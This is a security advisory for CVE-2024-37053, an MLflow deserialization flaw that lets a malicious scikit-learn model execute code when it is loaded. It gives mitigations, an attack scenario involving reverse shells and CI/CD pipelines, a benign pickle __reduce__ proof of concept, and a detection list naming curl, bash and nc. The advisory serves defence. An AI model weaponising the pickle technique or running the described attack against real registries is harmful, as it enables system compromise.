CVE-2024-37053: MLflow: RCE via malicious scikit-learn model deserialization
Severity: HIGH. Public PoC available. Any MLflow deployment where untrusted users can upload models is a full RCE vector: no authentication is needed to upload, and the attacker only needs a victim to load the model. Audit who has write access to your MLflow model registry immediately, and enforce model signing or allowlisting before loading external artifacts. If your data science teams pull models from shared or public registries without verification, assume the compromise risk is active.
Risk Assessment
High risk for organizations running MLflow with open or loosely controlled model upload permissions. CVSS 8.8 reflects the realistic scenario: low attack complexity, no attacker privileges required, and complete CIA triad impact once triggered. The user interaction requirement (someone loading the model) is trivially satisfied in normal ML workflows where engineers routinely load models from the registry. Exposure is amplified in multi-tenant MLflow deployments, shared experiment environments, and CI/CD pipelines that auto-load models for evaluation.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| mlflow | pip | >= 1.1.0 | No patch listed |
If you run MLflow 1.1.0 or later, you are affected.
Recommended Action
1. **Patch.** Update MLflow to the latest patched version immediately (check the HiddenLayer advisory for exact versions).
2. **Access control.** Restrict model upload permissions to authenticated, authorized users only; enforce RBAC on the MLflow server.
3. **Model signing.** Implement model signing and verification before any `load_model()` call in pipelines.
4. **Network isolation.** Run MLflow behind a VPN or on an internal network only, with no public-facing exposure.
5. **Detection.** Monitor for unexpected process spawning from Python interpreter processes that have loaded MLflow models (e.g., curl, bash, nc, reverse shells), and set up EDR alerts on pickle deserialization patterns.
6. **Workaround (if unpatched).** Scan model files with tools such as fickling (Trail of Bits) to detect malicious pickle payloads before loading.
7. **Audit.** Review MLflow audit logs for unexpected model uploads, especially from new or external accounts.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-37053?
CVE-2024-37053 is a deserialization-of-untrusted-data vulnerability in MLflow (versions 1.1.0 and later): a maliciously uploaded scikit-learn model can execute arbitrary code on the system of any user who loads it. Any deployment where untrusted users can upload models is therefore a full RCE vector, so audit who has write access to your model registry and enforce model signing or allowlisting before loading external artifacts.
Is CVE-2024-37053 actively exploited?
Active exploitation in the wild has not been confirmed, but proof-of-concept exploit code is publicly available for CVE-2024-37053, which increases the likelihood of exploitation.
How to fix CVE-2024-37053?
1. PATCH: Update MLflow to the latest patched version immediately (check HiddenLayer advisory for exact versions). 2. ACCESS CONTROL: Restrict model upload permissions to authenticated, authorized users only — enforce RBAC on MLflow server. 3. MODEL SIGNING: Implement model signing and verification before any load_model() call in pipelines. 4. NETWORK ISOLATION: Run MLflow behind VPN/internal network only; no public-facing exposure. 5. DETECTION: Monitor for unexpected process spawning from Python interpreter processes that loaded MLflow models (e.g., curl, bash, nc, reverse shells). Set up EDR alerts on pickle deserialization patterns. 6. WORKAROUND (if unpatched): Scan model files with tools like fickling (Trail of Bits) to detect malicious pickle payloads before loading. 7. AUDIT: Review MLflow audit logs for unexpected model uploads, especially from new or external accounts.
What systems are affected by CVE-2024-37053?
This vulnerability affects the following AI/ML architecture patterns: Model registries, ML experiment tracking platforms, Training pipelines, MLOps CI/CD pipelines, Model serving (evaluation phase).
What is the CVSS score for CVE-2024-37053?
CVE-2024-37053 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.44%.
Technical Details
NVD Description
Deserialization of untrusted data can occur in versions of the MLflow platform running version 1.1.0 or newer, enabling a maliciously uploaded scikit-learn model to run arbitrary code on an end user’s system when interacted with.
Exploitation Scenario
Adversary identifies an organization's MLflow instance (often exposed internally, sometimes publicly). Without requiring existing credentials (PR:N), they register a malicious scikit-learn model file containing a crafted pickle payload — trivially generated with publicly available tools. The payload establishes a reverse shell or downloads a second-stage implant. The adversary then waits or socially engineers a team member to run an evaluation script, trigger a CI/CD pipeline that auto-evaluates new models, or simply browse the experiment in the MLflow UI — any of which calls load_model() and triggers execution. In automated MLOps pipelines, exploitation is fully silent: upload model, wait for the next evaluation cron job, receive shell.
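The mechanism behind this scenario is plain pickle semantics: an object's `__reduce__` method tells the deserializer which callable to invoke at load time, so deserializing *is* executing. A deliberately harmless sketch follows; the "payload" here only creates a marker file via `open`, where a real exploit would call `os.system` or spawn a reverse shell:

```python
import os
import pickle
import tempfile

# Harmless stand-in side effect: loading the pickle creates this file.
MARKER = os.path.join(tempfile.gettempdir(), "mlflow_poc_marker.txt")

class MaliciousModel:
    """Shape of what an attacker embeds in an uploaded 'model' artifact."""
    def __reduce__(self):
        # Tells pickle which callable to invoke during deserialization.
        # A real payload would return (os.system, ("<shell command>",)).
        return (open, (MARKER, "w"))

artifact = pickle.dumps(MaliciousModel())  # attacker side: craft the artifact offline
pickle.loads(artifact)                     # victim side: merely loading it runs the callable
```

Note that the victim never calls any attacker-defined method explicitly; `pickle.loads()` (and hence any `load_model()` built on it) invokes the payload automatically.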
Weaknesses (CWE)
CWE-502: Deserialization of Untrusted Data
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
References
- hiddenlayer.com/sai-security-advisory/mlflow-june2024 (exploit, third-party advisory)
Related Vulnerabilities
- CVE-2025-15379 (10.0): MLflow: RCE via unsanitized model dependency specs (same package: mlflow)
- CVE-2023-3765 (10.0): MLflow: path traversal allows arbitrary file read (same package: mlflow)
- CVE-2026-2635 (9.8): mlflow: security flaw enables exploitation (same package: mlflow)
- CVE-2023-2780 (9.8): MLflow: path traversal allows arbitrary file read/write (same package: mlflow)
- CVE-2023-1177 (9.8): MLflow: path traversal allows arbitrary file read/write (same package: mlflow)